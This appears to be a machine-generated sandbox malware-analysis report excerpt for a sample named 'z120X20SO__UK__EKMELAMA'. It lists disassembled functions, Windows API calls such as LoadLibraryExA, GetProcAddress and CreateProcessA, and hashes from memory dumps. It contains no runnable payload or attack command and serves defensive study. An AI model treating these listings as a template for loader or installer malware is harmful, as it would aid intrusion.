                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                              • String ID: !
                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                              • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                                                                                                              • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                                                                                                                              • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                                                                                                              • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                                                                                                              • wsprintfA.USER32 ref: 00404A6A
                                                                                                                                                              • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                                                              • Opcode ID: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                                                                                                                              • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                                                                                                                              • Opcode Fuzzy Hash: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                                                                                                                              • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,36856FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 36858731
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 368587BA
                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 368587CC
                                                                                                                                                              • __freea.LIBCMT ref: 368587D5
                                                                                                                                                                • Part of subcall function 368556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 36855702
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                              • Opcode ID: d2ae7c4089757fb1022885d4d08b9541aad7648ce76caefb8fc3f7aa39b9329d
                                                                                                                                                              • Instruction ID: 05d3af636ec5ba445dda43b8dee009320701886d2a3912ccf80c2dea287f45f7
                                                                                                                                                              • Opcode Fuzzy Hash: d2ae7c4089757fb1022885d4d08b9541aad7648ce76caefb8fc3f7aa39b9329d
                                                                                                                                                              • Instruction Fuzzy Hash: 043103B6A0022EABDF148F65CC80EAF7BB6EB48314F020569EF14DB150EB35D851CB91
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,000000F0), ref: 004020C8
                                                                                                                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                                                                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                                                                                                                • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,?,74DF23A0), ref: 0040527A
                                                                                                                                                                • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                                                                                                              • LoadLibraryExA.KERNEL32(00000000,?,00000008,?,000000F0), ref: 004020D8
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 00402152
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2987980305-0
                                                                                                                                                              • Opcode ID: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
                                                                                                                                                              • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                                                                                                                              • Opcode Fuzzy Hash: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
                                                                                                                                                              • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,36851D66,00000000,00000000,?,36855C88,36851D66,00000000,00000000,00000000,?,36855E85,00000006,FlsSetValue), ref: 36855D13
                                                                                                                                                              • GetLastError.KERNEL32(?,36855C88,36851D66,00000000,00000000,00000000,?,36855E85,00000006,FlsSetValue,3685E190,FlsSetValue,00000000,00000364,?,36855BC8), ref: 36855D1F
                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,36855C88,36851D66,00000000,00000000,00000000,?,36855E85,00000006,FlsSetValue,3685E190,FlsSetValue,00000000), ref: 36855D2D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                              • Opcode ID: e8e8b94adcd16e1992c5c3c4a5e9a8df516d9e65e949cd82ec0fb4178485f6c2
                                                                                                                                                              • Instruction ID: 0c7fd222348034de07d3678eb6412affff25d95b46d71779b7309e2232143eee
                                                                                                                                                              • Opcode Fuzzy Hash: e8e8b94adcd16e1992c5c3c4a5e9a8df516d9e65e949cd82ec0fb4178485f6c2
                                                                                                                                                              • Instruction Fuzzy Hash: 3801D83B613336AFE3114A698C49B4A3759AF0D7E5B120630FB05E7140D724D802CAE1
                                                                                                                                                              APIs
                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,?,00436400), ref: 00405727
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040573B
                                                                                                                                                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040575A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3449924974-0
                                                                                                                                                              • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                                                                                              • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                                                                                                                              • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                                                                                              • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                                                                                                                              APIs
                                                                                                                                                              • DestroyWindow.USER32(?,00000000,0040301B,?), ref: 00402E50
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402E6E
                                                                                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                              • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                                                                                                              • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                                                                                                                              • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                                                                                                              • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _strlen
                                                                                                                                                              • String ID: : $Se.
                                                                                                                                                              • API String ID: 4218353326-4089948878
                                                                                                                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                              • Instruction ID: 9ca178f75a6b4000cbc90f7c17b9133ce820e35b0b3bd50697677c43ea6f2469
                                                                                                                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                              • Instruction Fuzzy Hash: 0F11E375900248AEDB10CFACDC40BEEFBFCEF1D204F11405AE655E7212E6705A02CB65
                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 36852903
                                                                                                                                                                • Part of subcall function 368535D2: RaiseException.KERNEL32(?,?,?,36852925,00000000,00000000,00000000,?,?,?,?,?,36852925,?,368621B8), ref: 36853632
                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 36852920
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                              • API String ID: 3476068407-410509341
                                                                                                                                                              • Opcode ID: a3a92eaf73c20067ffd00b8c690bbc0e2aff48205669b5469aad92feb2a4823c
                                                                                                                                                              • Instruction ID: c56e4487199c4947daadd1727ec66af01836a9f31c4aa2f66a47490b13cb72d5
                                                                                                                                                              • Opcode Fuzzy Hash: a3a92eaf73c20067ffd00b8c690bbc0e2aff48205669b5469aad92feb2a4823c
                                                                                                                                                              • Instruction Fuzzy Hash: A4F0F43C90430D779B00A6EAEC6496DB76C5B1C254B9241A0AB3492190FF31EA26C5DA
                                                                                                                                                              APIs
                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004051C1
                                                                                                                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                                                                                                                                • Part of subcall function 004041C7: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 004041D9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                              • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                                                                                                              • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                                                                                                                              • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                                                                                                              • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405CD3
                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                              • String ID: nsa
                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                              • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                                                                                              • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                                                                                                                              • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                                                                                              • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004057CC
                                                                                                                                                              Strings
                                                                                                                                                              • Error launching installer, xrefs: 004057A9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                              • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                                                                                                              • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                                                                                                                              • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                                                                                                              • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                              • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                                                                                              • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                                                                                                                              • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                                                                                              • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:6.3%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                              Signature Coverage:3.2%
                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                              Total number of Limit Nodes:77
                                                                                                                                                              execution_graph 37500 44dea5 37501 44deb5 FreeLibrary 37500->37501 37502 44dec3 37500->37502 37501->37502 39815 4147f3 39818 414561 39815->39818 39817 414813 39819 41456d 39818->39819 39820 41457f GetPrivateProfileIntW 39818->39820 39823 4143f1 memset _itow WritePrivateProfileStringW 39819->39823 39820->39817 39822 41457a 39822->39817 39823->39822 37503 4287c1 37504 4287d2 37503->37504 37505 429ac1 37503->37505 37507 428818 37504->37507 37508 42881f 37504->37508 37523 425711 37504->37523 37517 425ad6 37505->37517 37573 415c56 11 API calls 37505->37573 37540 42013a 37507->37540 37568 420244 97 API calls 37508->37568 37511 4260dd 37567 424251 120 API calls 37511->37567 37515 4259da 37566 416760 11 API calls 37515->37566 37520 429a4d 37521 429a66 37520->37521 37522 429a9b 37520->37522 37569 415c56 11 API calls 37521->37569 37535 429a96 37522->37535 37571 416760 11 API calls 37522->37571 37523->37505 37523->37515 37523->37520 37524 422aeb memset memcpy memcpy 37523->37524 37527 4260a1 37523->37527 37536 4259c2 37523->37536 37539 425a38 37523->37539 37556 4227f0 memset memcpy 37523->37556 37557 422b84 15 API calls 37523->37557 37558 422b5d memset memcpy memcpy 37523->37558 37559 422640 13 API calls 37523->37559 37561 4241fc 11 API calls 37523->37561 37562 42413a 90 API calls 37523->37562 37524->37523 37565 415c56 11 API calls 37527->37565 37530 429a7a 37570 416760 11 API calls 37530->37570 37572 424251 120 API calls 37535->37572 37536->37517 37560 415c56 11 API calls 37536->37560 37539->37536 37563 422640 13 API calls 37539->37563 37564 4226e0 12 API calls 37539->37564 37541 42014c 37540->37541 37544 420151 37540->37544 37583 41e466 97 API calls 37541->37583 37543 420162 37543->37523 37544->37543 37545 4201b3 37544->37545 37546 420229 37544->37546 37547 4201b8 37545->37547 37548 4201dc 37545->37548 37546->37543 37549 41fd5e 86 API calls 37546->37549 37574 41fbdb 37547->37574 37548->37543 37552 4201ff 37548->37552 37580 41fc4c 37548->37580 37549->37543 37552->37543 37555 42013a 97 API calls 37552->37555 37555->37543 37556->37523 37557->37523 37558->37523 37559->37523 37560->37515 37561->37523 37562->37523 37563->37539 37564->37539 37565->37515 37566->37511 37567->37517 37568->37523 37569->37530 37570->37535 37571->37535 37572->37505 37573->37515 37575 41fbf1 37574->37575 37576 41fbf8 37574->37576 37579 41fc39 37575->37579 37598 4446ce 11 API calls 37575->37598 37588 41ee26 37576->37588 37579->37543 37584 41fd5e 37579->37584 37581 41ee6b 86 API calls 37580->37581 37582 41fc5d 37581->37582 37582->37548 37583->37544 37586 41fd65 37584->37586 37585 41fdab 37585->37543 37586->37585 37587 41fbdb 86 API calls 37586->37587 37587->37586 37589 41ee41 37588->37589 37590 41ee32 37588->37590 37599 41edad 37589->37599 37602 4446ce 11 API calls 37590->37602 37593 41ee3c 37593->37575 37596 41ee58 37596->37593 37604 41ee6b 37596->37604 37598->37579 37608 41be52 37599->37608 37602->37593 37603 41eb85 11 API calls 37603->37596 37605 41ee70 37604->37605 37606 41ee78 37604->37606 37664 41bf99 86 API calls 37605->37664 37606->37593 37609 41be6f 37608->37609 37610 41be5f 37608->37610 37614 41be8c 37609->37614 37629 418c63 37609->37629 37643 4446ce 11 API calls 37610->37643 37613 41be69 37613->37593 37613->37603 37614->37613 37616 41bf3a 37614->37616 37617 41bed1 37614->37617 37625 41bee7 37614->37625 37646 4446ce 11 API calls 37616->37646 37619 41bef0 37617->37619 37621 41bee2 37617->37621 37620 41bf01 37619->37620 37619->37625 37622 41bf24 memset 37620->37622 37624 41bf14 37620->37624 37644 418a6d memset memcpy memset 37620->37644 37633 41ac13 37621->37633 37622->37613 37645 41a223 memset memcpy memset 37624->37645 37625->37613 37647 41a453 86 API calls 37625->37647 37628 41bf20 37628->37622 37632 418c72 37629->37632 37630 418c94 37630->37614 37631 418d51 memset memset 37631->37630 37632->37630 37632->37631 37634 41ac52 37633->37634 37635 41ac3f memset 37633->37635 37637 41ac6a 37634->37637 37648 41dc14 19 API calls 37634->37648 37639 41acd9 37635->37639 37640 41aca1 37637->37640 37649 41519d 37637->37649 37639->37625 37640->37639 37641 41acc0 memset 37640->37641 37642 41accd memcpy 37640->37642 37641->37639 37642->37639 37643->37613 37644->37624 37645->37628 37646->37625 37648->37637 37652 4175ed 37649->37652 37660 417570 SetFilePointer 37652->37660 37655 41760a ReadFile 37656 417637 37655->37656 37657 417627 GetLastError 37655->37657 37658 4151b3 37656->37658 37659 41763e memset 37656->37659 37657->37658 37658->37640 37659->37658 37661 41759c GetLastError 37660->37661 37663 4175b2 37660->37663 37662 4175a8 GetLastError 37661->37662 37661->37663 37662->37663 37663->37655 37663->37658 37664->37606 39824 44def7 39825 44df07 39824->39825 39826 44df00 ??3@YAXPAX 39824->39826 39827 44df17 39825->39827 39828 44df10 ??3@YAXPAX 39825->39828 39826->39825 39829 44df27 39827->39829 39830 44df20 ??3@YAXPAX 39827->39830 39828->39827 39831 44df37 39829->39831 39832 44df30 ??3@YAXPAX 39829->39832 39830->39829 39832->39831 37665 417bc5 37666 417c61 37665->37666 37671 417bda 37665->37671 37667 417bf6 UnmapViewOfFile CloseHandle 37667->37667 37667->37671 37669 417c2c 37669->37671 37677 41851e 20 API calls 37669->37677 37671->37666 37671->37667 37671->37669 37672 4175b7 37671->37672 37673 4175d6 CloseHandle 37672->37673 37674 4175c8 37673->37674 37675 4175df 37673->37675 37674->37675 37676 4175ce Sleep 37674->37676 37675->37671 37676->37673 37677->37669 37678 4152c7 malloc 37679 4152ef 37678->37679 37681 4152e2 37678->37681 37682 416760 11 API calls 37679->37682 